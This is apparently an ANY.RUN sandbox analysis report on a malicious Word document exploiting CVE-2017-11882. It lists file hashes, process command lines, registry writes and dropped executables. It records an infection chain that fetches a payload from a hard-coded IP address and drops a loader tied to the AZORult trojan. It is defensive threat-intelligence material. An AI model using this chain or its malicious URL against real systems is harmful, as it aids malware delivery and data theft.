General Info

File name

99e41bc7e38faf44b40023884d4e14168c6e259f807ab5fbe3b1ba2e1512ce4c.docx

Full analysis
https://app.any.run/tasks/f3563c39-db1c-475a-bfcc-904cf2674931
Verdict
Malicious activity
Analysis date
11/8/2018, 07:35:43
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

trojan

exploit

CVE-2017-11882

loader

rat

azorult

Indicators:

MIME:
application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info:
Microsoft Word 2007+
MD5

05bf3453cc17cf2fb0cc849fead0d3c2

SHA1

a58d0068723f3f3340c9f111460c6d9b5dad794c

SHA256

99e41bc7e38faf44b40023884d4e14168c6e259f807ab5fbe3b1ba2e1512ce4c

SSDEEP

192:htmm0ZQf4QtK57yMtWNU00mqQTnhr5OWQT1Q7dP55SzZbFTB8GoA6aukWJmf:htmdQztsyMtiU2LOWQT1Q7dDSzzdaHmf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
120 seconds
Additional time used
60 seconds
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
off

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (68.0.3440.106)
  • Google Update Helper (1.3.33.17)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 61.0.2 (x86 en-US) (61.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Downloads executable files from the Internet
  • EQNEDT32.EXE (PID: 3288)
Downloads executable files from IP
  • EQNEDT32.EXE (PID: 3288)
Suspicious connection from the Equation Editor
  • EQNEDT32.EXE (PID: 3288)
Equation Editor starts application (CVE-2017-11882)
  • EQNEDT32.EXE (PID: 3288)
Application was dropped or rewritten from another process
  • wiinilog.exe (PID: 2596)
Executable content was dropped or overwritten
  • wiinilog.exe (PID: 2596)
  • EQNEDT32.EXE (PID: 3288)
Creates files in the user directory
  • EQNEDT32.EXE (PID: 3288)
Unusual connect from Microsoft Office
  • WINWORD.EXE (PID: 3704)
Creates files in the user directory
  • WINWORD.EXE (PID: 3704)
Reads Microsoft Office registry keys
  • WINWORD.EXE (PID: 3704)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.docx
|   Word Microsoft Office Open XML Format document (52.2%)
.zip
|   Open Packaging Conventions container (38.8%)
.zip
|   ZIP compressed archive (8.8%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
0x0002
ZipCompression:
Deflated
ZipModifyDate:
2018:11:07 09:06:14
ZipCRC:
0x82872409
ZipCompressedSize:
358
ZipUncompressedSize:
1422
ZipFileName:
[Content_Types].xml
XML
Template:
dotm.dotm
TotalEditTime:
1 minute
Pages:
1
Words:
1
Characters:
7
Application:
Microsoft Office Word
DocSecurity:
None
Lines:
1
Paragraphs:
1
ScaleCrop:
No
HeadingPairs
null
null
TitlesOfParts:
null
Company:
SPecialiST RePack
LinksUpToDate:
No
CharactersWithSpaces:
7
SharedDoc:
No
HyperlinksChanged:
No
AppVersion:
14
LastModifiedBy:
Microsoft
RevisionNumber:
1
CreateDate:
2017:09:24 17:26:00Z
ModifyDate:
2017:09:24 17:27:00Z
XMP
Creator:
Microsoft

Screenshots

Processes

Total processes
34
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

+
start download and start winword.exe eqnedt32.exe wiinilog.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3704
CMD
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\99e41bc7e38faf44b40023884d4e14168c6e259f807ab5fbe3b1ba2e1512ce4c.docx"
Path
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Word
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\microsoft office\office14\wwlib.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\apphelp.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\microsoft office\office14\1033\wwintl.dll
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\program files\common files\microsoft shared\office14\msptls.dll
c:\windows\system32\uxtheme.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\winspool.drv
c:\windows\system32\shell32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sxs.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\program files\common files\microsoft shared\office14\csi.dll
c:\windows\system32\secur32.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\psapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshqos.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\credssp.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\cryptui.dll
c:\windows\system32\hlink.dll
c:\program files\microsoft office\office14\outlfltr.dll
c:\windows\system32\userenv.dll
c:\windows\system32\idndl.dll
c:\program files\common files\microsoft shared\office14\usp10.dll
c:\windows\system32\networkexplorer.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\program files\common files\microsoft shared\office14\1033\alrtintl.dll
c:\windows\system32\shdocvw.dll

PID
3288
CMD
"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Path
C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Design Science, Inc.
Description
Microsoft Equation Editor
Version
00110900
Modules
Image
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msi.dll
c:\program files\common files\microsoft shared\equation\1033\eeintl.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\roaming\wiinilog.exe

PID
2596
CMD
"C:\Users\admin\AppData\Roaming\wiinilog.exe"
Path
C:\Users\admin\AppData\Roaming\wiinilog.exe
Indicators
Parent process
EQNEDT32.EXE
User
admin
Integrity Level
MEDIUM
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\roaming\wiinilog.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\propsys.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\version.dll
c:\windows\system32\shfolder.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll

Registry activity

Total events
748
Read events
683
Write events
65
Delete events
0

Modification events

PID
Process
Operation
Key
Name
Value
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
/n$
2F6E2400780E0000010000000000000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
Off
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
On
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
WORDFiles
1298661393
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661508
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661509
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
780E0000687F8F4F2D77D40100000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
kn$
6B6E2400780E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
6o$
366F2400780E00000600000001000000E000000002000000D00000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C00740065006D0070005C0039003900650034003100620063003700650033003800660061006600340034006200340030003000320033003800380034006400340065003100340031003600380063003600650032003500390066003800300037006100620035006600620065003300620031006200610032006500310035003100320063006500340063002E0064006F0063007800000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
1
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
ProductFiles
1298661510
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
4600000069000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Count
1
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Type
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Protocol
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Version
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Flags
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
CobaltMajorVersion
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
CobaltMinorVersion
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
MsDavExt
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
Expiration
702ABE34317FD401
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://104.206.242.208/
EnableBHO
0
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
5+$
352B2400780E00000600000001000000D200000002000000C20000000400000063003A005C00750073006500720073005C00610064006D0069006E005C0061007000700064006100740061005C006C006F00630061006C005C006D006900630072006F0073006F00660074005C00770069006E0064006F00770073005C00740065006D0070006F007200610072007900200069006E007400650072006E00650074002000660069006C00650073005C0063006F006E00740065006E0074002E006D0073006F005C00330063006400360032003100610061002E0064006F006300000000000000
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
{3FBD269F-BBBE-4DDC-A7F8-42C8A81C3EDF}
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Max Display
25
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Place MRU
Item 1
[F00000000][T01D4772D59AA3E70][O00000000]*http://104.206.242.208/
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Max Display
25
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000000][T01D4772D59ACAF70][O00000000]*http://104.206.242.208/wiininilog.doc
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU
Item 1
[F00000002][T01D4772D59ACAF70][O00000000]*http://104.206.242.208/wiininilog.doc
3704
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\186E85
186E85
04000000780E00002500000068007400740070003A002F002F003100300034002E003200300036002E003200340032002E003200300038002F007700690069006E0069006E0069006C006F0067002E0064006F0063000E0000007700690069006E0069006E0069006C006F0067002E0064006F00630000000000010000000000000000F51FAB7076D401856E1800856E180000000000DB040000000000000000000000000000000000000000000000000000FFFFFFFF0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000FFFFFFFF
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661386
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661387
3704
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
ProductNonBootFilesIntl_1033
1298661388
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109E60090400000000000F01FEC\Usage
EquationEditorFilesIntl_1033
1298661379
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
EnableFileTracing
0
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
EnableConsoleTracing
0
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
FileTracingMask
4294901760
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
ConsoleTracingMask
4294901760
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
MaxFileSize
1048576
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASAPI32
FileDirectory
%windir%\tracing
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
EnableFileTracing
0
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
EnableConsoleTracing
0
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
FileTracingMask
4294901760
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
ConsoleTracingMask
4294901760
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
MaxFileSize
1048576
3288
EQNEDT32.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\EQNEDT32_RASMANCS
FileDirectory
%windir%\tracing
3288
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
3288
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006A000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
3288
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
3288
EQNEDT32.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1

Files activity

Executable files
5
Suspicious files
25
Text files
7
Unknown types
2

Dropped files

PID
Process
Filename
Type
2596
wiinilog.exe
C:\Users\admin\AppData\Roaming\navicula.exe
executable
MD5: 8073f2e2453cc4267b6cac9ea6fd5156
SHA256: 7440684ebb6d01a9293a966d78d56ed2f567896151e5a3ea2f6ec5fdc1ae5db3
3288
EQNEDT32.EXE
C:\Users\admin\AppData\Roaming\wiinilog.exe
executable
MD5: 8073f2e2453cc4267b6cac9ea6fd5156
SHA256: 7440684ebb6d01a9293a966d78d56ed2f567896151e5a3ea2f6ec5fdc1ae5db3
3288
EQNEDT32.EXE
C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\12[1].ex
executable
MD5: 8073f2e2453cc4267b6cac9ea6fd5156
SHA256: 7440684ebb6d01a9293a966d78d56ed2f567896151e5a3ea2f6ec5fdc1ae5db3
2596
wiinilog.exe
C:\Users\admin\AppData\Local\Temp\nsk7F1F.tmp\System.dll
executable
MD5: 75ed96254fbf894e42058062b4b4f0d1
